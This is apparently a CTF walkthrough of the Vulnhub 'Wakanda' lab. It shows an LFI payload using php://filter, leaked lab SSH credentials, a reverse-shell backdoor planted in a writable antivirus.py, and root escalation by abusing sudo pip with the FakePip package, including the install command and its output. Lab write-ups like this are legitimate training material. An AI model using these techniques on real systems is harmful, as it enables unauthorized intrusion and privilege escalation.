
Hack The Machine WAKANDA BY- TURBANED SECUR!TY
Hello Guys..Today i would be undertaking another CTF Challenge named WAKANDA available on Vulnhub. Though the machine name immediately caught my attention as i being a fan of Marvel Comics and so i decided to root it .It is a fantastic intermediate level machine to crack in which there are total 3 flags which are needed in order to complete this challenge. Going ahead with the machine’s specific and tools and techniques used-
Machine Details-
Technique and Tools used — -
- Network scaning(Tool-Nmap)
- Directory brute-force attack(Tool-Dirbuster)
- Crawling through the web directories .
- LFI using php filter
- Decoding the base 64 encoded text for password
- SSH Login
- Getting the initial flag.
- using find parameter to check for 2nd flag and owner of it.
- Implanting python backdoor at antivirus.py
- Get netcat session
- Getting the 2nd flag
- Exploit Fake Pip -For Privileged escalation to root
- Get the Root access and Capture the 3rd flag
LET’S ROLL UP OUR GEAR AND ATTACK-
Starting up-We would be using Netdiscover so as to get the i.p address of the victim machine(Wakanda).Command used->netdiscover -r

ENUMERATION-Now to get the open ports and services we would be using the ne and only tool also called the hackers buddy -The NMAP .Command used-> Nmap -Pn -A i.paddress , As i already had the details from my previous nmap scan , so i am directly specifying the ports while initiating the scan so as to save my time.

As we have port 80 open,Hence lets go ahead and check it on our browser to see what we have on our plate.Also we would be checking the source page.


In the View Source you would be able to see a reference in the quotes to ?lang=fr .Just keep this in mind as when you would try to directorybruteforce it using dirbuster you would see a same directory.Just go ahead and check this in browser.

So there seems to be a php script(check your dirb output) running which is changing the output to french.While at the same time there seems to be some sought of php filter.Let us check it out for LFI. You can get the required payload from this awesome repository-https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal#basic-lfi

So here we have a base64 encoded key.Payload used to get to it ->192.168.1.8/?lang=page=php://filter/convert.base64-encode/resource=index .Let’s decode it using an online decoder tool.

So here we have a password lets try to ssh to the machine using the details that we have got.Use password-Niamey4Ever227!!! and user-mamadou and We would import pty module, and spawn ‘/bin/bash’ shell.

Now let’s get to our first flag and also check for the second flag using the find parameter.


Now we can check here that flag2 is owned by user devops .While furhter enumerating we can also check that we have write access on .antivirus.py .Lets implant out python payload to it.You can get the same from pentestmonkey-http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet and start and check our netcat listener and spawn a bash shell.

Now lets go ahead and check for our 2 nd flag.
- >cd /home
- ->cat flag2.txt

Now checking permission.->Sudo -l
Output-
devops@Wakanda1:~$ sudo -l
Matching Defaults entries for devops on Wakanda1:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/binUser devops may run the following commands on Wakanda1:
(ALL) NOPASSWD: /usr/bin/pip
“pip” can be run as root without providing a password. We can abuse “pip” to escalate our privileges. I found this method on https://github.com/0x00-0x00/FakePip. Just edit the reverse shell exploit and host it using python, so we can download it to victim machine using wget.



In the above screenshot we have spawned a simple http server so as to host this exploit and then we can wget the same on the victim wakanda machine.
Afterwards we can simply spawn a netcan listener and start listening and type in the following command as mentioned in the exploit-
->sudo /usr/bin/pip install . — upgrade — force-reinstall
devops@Wakanda1:/tmp/fakepip$ sudo /usr/bin/pip install . — upgrade — force-reinstall
Unpacking /tmp/fakepip
Running setup.py (path:/tmp/pip-WU01on-build/setup.py) egg_info for package from file:///tmp/fakepipInstalling collected packages: FakePip
Found existing installation: FakePip 0.0.1
Uninstalling FakePip:
Successfully uninstalled FakePip
Running setup.py install for FakePip
And finally we have our reverse shell as root and we can get the final root flag.
#Happy Hacking from Turbaned Security.
- >cat toot.txt

